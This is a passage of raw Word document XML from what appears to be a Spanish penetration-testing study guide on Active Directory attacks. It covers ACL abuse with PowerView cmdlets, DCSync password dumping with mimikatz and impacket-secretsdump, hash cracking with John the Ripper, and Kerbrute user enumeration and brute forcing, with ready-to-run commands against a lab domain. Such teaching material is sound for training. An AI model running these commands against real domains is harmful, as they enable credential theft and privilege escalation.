      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de añadir usuarios, grupos o equipos arbitrarios al grupo de destino. Abusado con Add-DomainGroupMember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6AC70" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>GenericAll:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona control total del objeto, incluyendo la capacidad de añadir otros usuarios a un grupo, cambiar una contraseña de usuario sin conocer su valor actual, registrar un SPN con un objeto de usuario, etc. Abusado con Set-DomainUserPassword o Add-DomainGroupMember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD21323" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>GenericWrite:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de actualizar cualquier valor de parámetro de objeto de destino no protegido. Por ejemplo, actualizar el valor del parámetro "scriptPath" en un objeto de usuario de destino para hacer que ese usuario ejecute los comandos/ejecutables especificados la próxima vez que se conecte. Abusado con Set-DomainObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02350660" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WriteOwner:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de actualizar el propietario del objeto de destino. Una vez que el propietario del objeto ha sido cambiado a un usuario que el atacante controla, el atacante puede manipular el objeto de la manera que crea conveniente. Abusado con Set-DomainObjectOwner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4742507D" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WriteDACL:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de escribir una nueva ACE en la DACL del objeto objetivo. Por ejemplo, un atacante puede escribir una nueva ACE en la DACL del objeto de destino, dándole el "control total" del objeto de destino. Abusado con Add-NewADObjectAccessControlEntry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5616AD6B" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>AllExtendedRights:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de realizar cualquier acción asociada con los derechos extendidos de Active Directory contra el objeto. Por ejemplo, añadir usuarios a un grupo y forzar el cambio de la contraseña de un usuario de destino. Se abusa con Set-DomainUserPassword o Add-DomainGroupMember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F8233" w14:textId="77777777" w:rsidR="00976190" w:rsidRDefault="00976190" w:rsidP="00976190"/>
    <w:p w14:paraId="00BC5981" w14:textId="0366F72C" w:rsidR="00976190" w:rsidRDefault="00976190" w:rsidP="00976190">
      <w:r>
        <w:t>Una vez tengamos comprometido algún usuario atacante, para conectarnos podemos hacerlo de dos formas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479DECBA" w14:textId="6437A5C0" w:rsidR="00976190" w:rsidRDefault="00976190" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graficamente: Simplemente Click derecho sobre el icono de Powershell y ejecutar como otro usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D611C" w14:textId="2DF9F379" w:rsidR="00976190" w:rsidRDefault="00976190" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En Powershell usar el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7F2EE" w14:textId="0833D874" w:rsidR="00976190" w:rsidRPr="008B711A" w:rsidRDefault="00976190" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runas /user:(dominio)\(usuario) /netonly powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866A6A3" w14:textId="24499298" w:rsidR="00976190" w:rsidRPr="008B711A" w:rsidRDefault="00976190" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runas /user:corp\empleado2 /netonly powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029139E5" w14:textId="02892B5B" w:rsidR="00976190" w:rsidRDefault="00F91D5C" w:rsidP="00976190">
      <w:r>
        <w:t>Para ir explotando ACL</w:t>
      </w:r>
      <w:r w:rsidR="002E562F">
        <w:t xml:space="preserve">, pulsamos en </w:t>
      </w:r>
      <w:r w:rsidR="002E562F" w:rsidRPr="00A136C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Inbound Control Rights</w:t>
      </w:r>
      <w:r w:rsidR="002E562F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E562F" w:rsidRPr="002E562F">
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="002E562F">
        <w:t>nos indicará qué permiso debemos explotar así como el comando para ir obteniendo y escalando. Recuerda cargar PowerView. Lo importante es ir obteniendo los permisos para ir agregándote a grupos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348681B4" w14:textId="31C38E13" w:rsidR="002E562F" w:rsidRDefault="002E562F" w:rsidP="00976190">
      <w:r>
        <w:t>Debes reiniciar la consola de comandos cada vez que agregues al usuario a un nuevo grupo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5C93D" w14:textId="3A5235F6" w:rsidR="002E562F" w:rsidRDefault="002E562F" w:rsidP="00976190">
      <w:r w:rsidRPr="001300BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Explotación DCSyn:</w:t>
      </w:r>
      <w:r w:rsidRPr="001300BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Consiste</w:t>
      </w:r>
      <w:r w:rsidR="001300BC">
        <w:t xml:space="preserve"> en usar el privilego de répicla del dominio. Si encontramos un us</w:t>
      </w:r>
      <w:r w:rsidR="00D4336D">
        <w:t>ua</w:t>
      </w:r>
      <w:r w:rsidR="001300BC">
        <w:t>rio con el permiso DCSyn podríamos hacer un dump de todas las contraseñas hasheadas del sistema. Contamos con dos formas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49532088" w14:textId="3EEE15F0" w:rsidR="001300BC" w:rsidRDefault="001300BC" w:rsidP="001300BC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4336D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mimikatz:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4336D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Descargamos el binario desde el repositorio de GitHub</w:t>
      </w:r>
      <w:r w:rsidR="00DF2B7A">
        <w:t xml:space="preserve"> (mimikatz_trunk.zip) y abrimos el exe en nuestra máquina Windows (Problemas con Antivirus de Microsoft). Para ejecutarlo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CF548" w14:textId="7F1D87B8" w:rsidR="00DF2B7A" w:rsidRPr="00DF2B7A" w:rsidRDefault="00DF2B7A" w:rsidP="00DF2B7A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. \mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC62325" w14:textId="3F0E1672" w:rsidR="00DF2B7A" w:rsidRPr="00DF2B7A" w:rsidRDefault="00DF2B7A" w:rsidP="00DF2B7A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lsadump::dcsync /user:corp\(nombre de usuario)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEB199" w14:textId="014A1830" w:rsidR="00DF2B7A" w:rsidRDefault="00DF2B7A" w:rsidP="00DF2B7A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desde Kali, usando </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0631B726" w14:textId="0F54225E" w:rsidR="00DF2B7A" w:rsidRPr="00DF2B7A" w:rsidRDefault="00DF2B7A" w:rsidP="00DF2B7A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump -just-dc (usuario con permiso DCsyn):”(contraseña)”@(ip del DC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348B280" w14:textId="162AD90F" w:rsidR="00DF2B7A" w:rsidRPr="00DF2B7A" w:rsidRDefault="00DF2B7A" w:rsidP="00DF2B7A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump -just-dc empleado1:”Passw0rd1”@192.168.20.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB9764" w14:textId="39B6AF37" w:rsidR="00CE6929" w:rsidRPr="00707B9C" w:rsidRDefault="00707B9C" w:rsidP="00707B9C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B9C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Para descifrar los hashes, podemos usar John</w:t>
      </w:r>
      <w:r w:rsidR="00510455">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="00707B9C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCF858" w14:textId="1DF4EC03" w:rsidR="00707B9C" w:rsidRPr="00707B9C" w:rsidRDefault="00707B9C" w:rsidP="00707B9C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>john --format=NT (fichero)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556B9CB" w14:textId="77777777" w:rsidR="001300BC" w:rsidRPr="00F91D5C" w:rsidRDefault="001300BC" w:rsidP="00976190"/>
    <w:p w14:paraId="51758C2D" w14:textId="586D0D96" w:rsidR="00611BD8" w:rsidRDefault="00611BD8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="283AD96D" w14:textId="1C2DE458" w:rsidR="00AF23BB" w:rsidRDefault="00AF23BB" w:rsidP="00785932">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>KERBRUTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF15CC" w14:textId="52CD4773" w:rsidR="00976190" w:rsidRPr="00611BD8" w:rsidRDefault="00611BD8" w:rsidP="00785932">
      <w:r w:rsidRPr="00611BD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeración de usuarios con Kerbrute (Kerberos): </w:t>
      </w:r>
      <w:r w:rsidR="00785932" w:rsidRPr="00AF23BB">
        <w:t xml:space="preserve">Kerbrute nos permite </w:t>
      </w:r>
      <w:r w:rsidR="00AF23BB" w:rsidRPr="00AF23BB">
        <w:t>enumerar los usuarios de un dominio.</w:t>
      </w:r>
      <w:r w:rsidR="00AF23BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00611BD8">
        <w:t>https://github.com/ropnop/kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33286D53" w14:textId="1A2D0148" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="0019417B">
      <w:r>
        <w:t>Para instalar Kerbrute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309E441" w14:textId="063B7C9E" w:rsidR="00A136C7" w:rsidRPr="00D15793" w:rsidRDefault="00D15793" w:rsidP="00D15793">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install golang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BBB85" w14:textId="3F83585E" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="0019417B">
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nano .zshrc</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>y añadimos las siguientes líneas al final del archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737370B9" w14:textId="344EFE9A" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="00D15793">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558A3A4D" wp14:editId="32EB8C71">
            <wp:extent cx="4412362" cy="1242168"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2540203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020363" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4412362" cy="1242168"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF882B" w14:textId="510D0175" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="00D15793">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finalmente, usamos </w:t>
      </w:r>
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source .zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3212395C" w14:textId="364ED4CE" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="00D15793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>go install github.com/ropnop/kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E207A4C" w14:textId="5BA7178B" w:rsidR="00D15793" w:rsidRDefault="00D15793" w:rsidP="00D15793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">go install </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="000C0662">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>github.com/rverton/webanalyze/cmd/webanalyze@latest</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D7F271D" w14:textId="5DC6B991" w:rsidR="00D15793" w:rsidRDefault="00785932" w:rsidP="00D15793">
      <w:r w:rsidRPr="00785932">
        <w:t>Para listar si existen usuarios según un fichero:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D21954" w14:textId="14E87222" w:rsidR="00AF23BB" w:rsidRPr="00AF23BB" w:rsidRDefault="00AF23BB" w:rsidP="00D15793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kerbrute userenum -d (dominio) (archivo donde están los usuarios a comprobar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05CE6F" w14:textId="77777777" w:rsidR="00AF23BB" w:rsidRPr="00785932" w:rsidRDefault="00AF23BB" w:rsidP="00D15793"/>
    <w:p w14:paraId="312E9764" w14:textId="33762ED0" w:rsidR="00D15793" w:rsidRDefault="00AF23BB" w:rsidP="00D15793">
      <w:r w:rsidRPr="00AF23BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Fuerza bruta con Kerbrute:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tenemos que tener mucho cuidado con esta técnica pues normalmente hay un límite de intentos antes de bloquear una cuenta. Podemos bloquear muchos usuarios al hacerlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E217D" w14:textId="19394549" w:rsidR="00AF23BB" w:rsidRPr="00AF23BB" w:rsidRDefault="00AF23BB" w:rsidP="00D15793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kerbrute bruteuser -d (dominio) (archivo listado de contraseñas) (usuario a testar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C65696" w14:textId="3ECAAC3E" w:rsidR="00AF23BB" w:rsidRPr="00AF23BB" w:rsidRDefault="00AF23BB" w:rsidP="00D15793">
      <w:r>
        <w:t xml:space="preserve">También podríamos usar técnicas de </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Password Spray</w:t>
      </w:r>
      <w:r>
        <w:t>, pero no son recomendadas porque pueden bloquear muchas cuentas de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46122170" w14:textId="2D1E4C63" w:rsidR="00AF23BB" w:rsidRPr="006C15B0" w:rsidRDefault="006C15B0" w:rsidP="006C15B0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C15B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REQ Roasting: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C15B0">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Si conseguimos snnifar un paquete de red AS-REP (el primero que manda la máquina al servicio de Kerberos) podemos intentar crackear con John the Ripper el hash obtenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30BA01" w14:textId="60E23CA7" w:rsidR="006C15B0" w:rsidRPr="006C15B0" w:rsidRDefault="006C15B0" w:rsidP="006C15B0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C15B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP Roasting: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C15B0">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Si un usuario tiene activada la casilla de no necesitar Kerberos, puede ser capaz de obtener la contraseña de cualquier usuario hasheada usando Rubeus. También si un usuario tiene permiso total de escritura sobre otro, simplemente podría marcarle esa casilla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349464F" w14:textId="403906A7" w:rsidR="006C15B0" w:rsidRDefault="00D578B3" w:rsidP="005122CB">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00D578B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TGS-REP con Impacket:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D578B3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D578B3">
        <w:t xml:space="preserve">Necesitamos al menos un usuario, aunque sea sin privilegios. </w:t>
      </w:r>
      <w:r>
        <w:t>Podemos conseguir la clave de los servicios fácilmente desde Kali con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E965E3" w14:textId="11BB0655" w:rsidR="00D578B3" w:rsidRDefault="00D578B3" w:rsidP="005122CB">
      <w:pPr>
